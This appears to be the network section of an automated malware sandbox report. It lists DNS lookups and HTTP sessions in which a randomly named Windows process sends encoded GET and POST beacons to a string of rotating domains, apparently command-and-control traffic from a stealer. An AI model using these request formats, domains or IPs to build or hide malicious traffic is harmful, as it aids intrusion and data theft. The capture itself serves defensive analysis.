                                                              Nov 12, 2024 15:31:48.574136019 CET4998880192.168.2.7170.39.213.43
                                                              Nov 12, 2024 15:31:48.584887028 CET8049988170.39.213.43192.168.2.7
                                                              Nov 12, 2024 15:31:53.606173038 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.611109018 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:53.611821890 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.622720957 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:53.627717018 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:54.295245886 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:54.295332909 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:55.133851051 CET4998980192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:55.138959885 CET804998913.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.152630091 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.157730103 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.157818079 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.172172070 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:56.177426100 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.838399887 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:56.841881990 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:57.679742098 CET4999080192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:57.684735060 CET804999013.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.698931932 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.704015017 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.704101086 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.717658043 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:31:58.722651005 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:58.722673893 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:59.382127047 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:31:59.387758017 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:00.226345062 CET4999180192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:00.232407093 CET804999113.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.245770931 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.250840902 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.250979900 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.258341074 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.263485909 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.910918951 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.943325996 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:01.943439007 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.944662094 CET4999280192.168.2.713.248.169.48
                                                              Nov 12, 2024 15:32:01.949579000 CET804999213.248.169.48192.168.2.7
                                                              Nov 12, 2024 15:32:06.991756916 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:06.996931076 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:06.999980927 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:07.011147022 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:07.015995026 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:07.964400053 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:08.007534027 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:08.143722057 CET804999338.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:08.143805027 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:08.523242950 CET4999380192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.541954994 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.547070980 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:09.549887896 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.562175035 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:09.567008018 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798329115 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798712015 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798787117 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:10.798813105 CET804999438.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:10.798857927 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:11.070322990 CET4999480192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.089728117 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.094578028 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:12.094652891 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.108653069 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:12.113588095 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:12.113928080 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.051506042 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.101809025 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:13.233422995 CET804999538.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:13.233562946 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:13.617829084 CET4999580192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.637378931 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.642704964 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:14.642810106 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.653965950 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:14.658862114 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.630985975 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.679445028 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:15.812645912 CET804999638.47.232.194192.168.2.7
                                                              Nov 12, 2024 15:32:15.812783003 CET4999680192.168.2.738.47.232.194
                                                              Nov 12, 2024 15:32:15.815757036 CET4999680192.168.2.738.47.232.194
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 15:30:51.060600996 CET | 192.168.2.7 | 1.1.1.1 | 0xd889 | Standard query (0) | www.tangible.online | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:30:56.104475021 CET | 192.168.2.7 | 1.1.1.1 | 0xa786 | Standard query (0) | www.tesetturhanzade.xyz | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:12.448606014 CET | 192.168.2.7 | 1.1.1.1 | 0xe910 | Standard query (0) | www.kantinestoel.online | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:26.167290926 CET | 192.168.2.7 | 1.1.1.1 | 0xe043 | Standard query (0) | www.deeplungatlas.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:39.886172056 CET | 192.168.2.7 | 1.1.1.1 | 0xe8e3 | Standard query (0) | www.ultrawin23.shop | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:53.589075089 CET | 192.168.2.7 | 1.1.1.1 | 0x5e49 | Standard query (0) | www.sonoscan.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:06.951756954 CET | 192.168.2.7 | 1.1.1.1 | 0x4ef2 | Standard query (0) | www.zz67x.top | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:20.824088097 CET | 192.168.2.7 | 1.1.1.1 | 0x1cc6 | Standard query (0) | www.omnibizlux.biz | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:34.215806007 CET | 192.168.2.7 | 1.1.1.1 | 0x1522 | Standard query (0) | www.vibixx.site | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:48.153987885 CET | 192.168.2.7 | 1.1.1.1 | 0xaf85 | Standard query (0) | www.rka6460.online | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:53.681330919 CET | 192.168.2.7 | 1.1.1.1 | 0xb23c | Standard query (0) | www.rka6460.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 15:30:51.083847046 CET | 1.1.1.1 | 192.168.2.7 | 0xd889 | Name error (3) | www.tangible.online | none | none | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:30:56.306859016 CET | 1.1.1.1 | 192.168.2.7 | 0xa786 | No error (0) | www.tesetturhanzade.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:30:56.306859016 CET | 1.1.1.1 | 192.168.2.7 | 0xa786 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:30:56.306859016 CET | 1.1.1.1 | 192.168.2.7 | 0xa786 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:12.477277040 CET | 1.1.1.1 | 192.168.2.7 | 0xe910 | No error (0) | www.kantinestoel.online | kantinestoel.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:31:12.477277040 CET | 1.1.1.1 | 192.168.2.7 | 0xe910 | No error (0) | kantinestoel.online | | 91.184.0.200 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:26.239876986 CET | 1.1.1.1 | 192.168.2.7 | 0xe043 | No error (0) | www.deeplungatlas.org | | 194.9.94.85 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:26.239876986 CET | 1.1.1.1 | 192.168.2.7 | 0xe043 | No error (0) | www.deeplungatlas.org | | 194.9.94.86 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:40.245990992 CET | 1.1.1.1 | 192.168.2.7 | 0xe8e3 | No error (0) | www.ultrawin23.shop | ultrawin23.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:31:40.245990992 CET | 1.1.1.1 | 192.168.2.7 | 0xe8e3 | No error (0) | ultrawin23.shop | | 170.39.213.43 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:53.602463961 CET | 1.1.1.1 | 192.168.2.7 | 0x5e49 | No error (0) | www.sonoscan.org | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:31:53.602463961 CET | 1.1.1.1 | 192.168.2.7 | 0x5e49 | No error (0) | www.sonoscan.org | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:06.978616953 CET | 1.1.1.1 | 192.168.2.7 | 0x4ef2 | No error (0) | www.zz67x.top | zz67x.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:32:06.978616953 CET | 1.1.1.1 | 192.168.2.7 | 0x4ef2 | No error (0) | zz67x.top | | 38.47.232.194 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:20.835546970 CET | 1.1.1.1 | 192.168.2.7 | 0x1cc6 | No error (0) | www.omnibizlux.biz | | 167.172.133.32 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:34.766196012 CET | 1.1.1.1 | 192.168.2.7 | 0x1522 | No error (0) | www.vibixx.site | | 162.0.211.143 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:32:48.215430975 CET | 1.1.1.1 | 192.168.2.7 | 0xaf85 | No error (0) | www.rka6460.online | rka6460.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 15:32:53.743803978 CET | 1.1.1.1 | 192.168.2.7 | 0xb23c | No error (0) | www.rka6460.online | rka6460.online | | CNAME (Canonical name) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49965 | 85.159.66.93 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 15:30:56.327024937 CET | 347 | OUT | GET /ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK HTTP/1.1
Accept: */*
Accept-Language: en-US
Host: www.tesetturhanzade.xyz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 12, 2024 15:30:57.211643934 CET | 225 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Tue, 12 Nov 2024 14:30:57 GMT
Content-Length: 0
Connection: close
X-Rate-Limit-Limit: 5s
X-Rate-Limit-Remaining: 19
X-Rate-Limit-Reset: 2024-11-12T14:31:02.0765892Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49977 | 91.184.0.200 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 15:31:12.495757103 CET | 628 | OUT | POST /ggvc/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.kantinestoel.online
Origin: http://www.kantinestoel.online
Cache-Control: no-cache
Connection: close
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
Referer: http://www.kantinestoel.online/ggvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Data Ascii: ZtwlQ=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq05dxZWMUWoi0Br5wFym7iwQXEBjEfyttPNhOFVEexTNH65VexQ==
Nov 12, 2024 15:31:13.333739042 CET | 500 | IN | HTTP/1.1 404 Not Found
Date: Tue, 12 Nov 2024 14:31:13 GMT
Server: Apache
X-Xss-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49978 | 91.184.0.200 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 15:31:15.042330027 CET | 648 | OUT | POST /ggvc/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.kantinestoel.online
Origin: http://www.kantinestoel.online
Cache-Control: no-cache
Connection: close
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
Referer: http://www.kantinestoel.online/ggvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Data Ascii: ZtwlQ=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVMiV7vIqvnPXiI78YdAZdOLt1CVaVYXJ1USwEVUunMWsh56vZcoJddVhEBDNwbv8GS8YRpfSeIrEYyyQCIoGshNjbCLWWlo+BHAHRfMCnvTgkTww8mTOJ+6lxoNkalNVQrmOJ94SfQqX8hosADHyIUwYNMlWI3w/ukot3r0anr2/HM1WQ9vzszzh+ZcUhqE=
Nov 12, 2024 15:31:15.853849888 CET | 500 | IN | HTTP/1.1 404 Not Found
Date: Tue, 12 Nov 2024 14:31:15 GMT
Server: Apache
X-Xss-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49979 | 91.184.0.200 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 15:31:17.633007050 CET | 1661 | OUT | POST /ggvc/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.kantinestoel.online
Origin: http://www.kantinestoel.online
Cache-Control: no-cache
Connection: close
Content-Length: 1250
Content-Type: application/x-www-form-urlencoded
Referer: http://www.kantinestoel.online/ggvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Ascii: ZtwlQ=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVM6V6aUq1AbXjI78bdAcdOK31BleVYr31RewF2cuh52sr56vbcoIANVOEBTJwaD8GS8YRv7SOKTELiyPSYow9xMEbB6rWlsEB2gHW/cClZPgvTwy7mTWJ+3lxst/amQdQpmOYrUMGE+tlw8RJg7xGXYeIP5sXwcIs2lU3N8kjr7vWvZdJvn7lHKXkaICj86QggB71oqhsQ89BtsTgwMo0tAMlXfLB3nwmmQ8k8RdsCtLp5zjR3K8egGAsTY1tlIn1aEbCUx4iL2vcl1Ka0WM6TNiPPZkG4ZrFHlTOwP+MNFfxK8n6LOycH00jDowGSIU81/Rtus1dyyd3bs7546E8HUD/spAFXXVLjj5zMGvndRsMuCtP23g1u7u9XX+HYaU65Gg55Ofi5VjG7zqQ7gAcnq+LGzpAR753MZZVe5OqRC/f1EC43yHIYBl1oJgf+wc7HqRSwYoAM8nzu8V+VbBOFsuG4IOOHc+vs3fxYn4hSHQfqdA2IMBJw4+z18t0ZvDCTE2nPsgr2aywyKP+H77Cy8iCB++H1vSBdsAV+S+Fy8H6lWIkaq/5nxUkXMl65GKXjuYwzuaSGeB9CEKZB69bJZd2aRdz38aFMzy9wwOEyOYJ1nTetLmyIswAipadzhy0t20UkHgFLxOGt5GfOl5FFScUYdZ6V5QX4sAPGVPpEEUCOF9eC6EKg7eEEUBRyCAFb+DX/s0H8BtiZXWdK0avHt1GqWZUxJKMb2tMdhs5tmWGQbJIsGcAokRovZ0uDMUFau6juzP8x2wn0OzgcDoxQEFxE5iJeRmrXSn7WKTXJ3NaEHByXIkxTHcMWAbQXAlImCLstVC58RaLC1/mHIN2zhF+Xh8axvUw+8Qez9+kc//43whCH+c7D2a5UuCI/Vi4a4YFQ7T7FHLGzCWzIAHyz0D6d7lNhS2dl17J2msULn/0lZvKOZMfXU2klgyxE1xBhJVts [TRUNCATED]
                                                              Nov 12, 2024 15:31:18.436959028 CET  500                IN         HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:18 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              4           192.168.2.7  49980        91.184.0.200    80                1396  C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 12, 2024 15:31:20.179465055 CET  347                OUT        GET /ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.kantinestoel.online
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:21.021104097 CET  500                IN         HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:20 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              5           192.168.2.7  49981        194.9.94.85     80                1396  C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 12, 2024 15:31:26.259960890 CET  622                OUT        POST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:27.110738993 CET  1236               IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script><!-- End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:27.110759020 CET  1236               IN
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:27.110773087 CET  1236               IN
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:27.111051083 CET  1236               IN
                                                              Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                              Nov 12, 2024 15:31:27.111063957 CET  878                IN
                                                              Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              6           192.168.2.7  49982        194.9.94.85     80                1396  C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 12, 2024 15:31:28.827096939 CET  642                OUT        POST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:29.646936893 CET  1236               IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script><!-- End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:29.646962881 CET  1236               IN
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:29.646977901 CET  1236               IN
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:29.646991014 CET  1236               IN
                                                              Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                              Nov 12, 2024 15:31:29.647005081 CET  848                IN
                                                              Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                                                              Nov 12, 2024 15:31:29.647017002 CET  30                 IN
                                                              Data Ascii: nt --></body></html>0


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
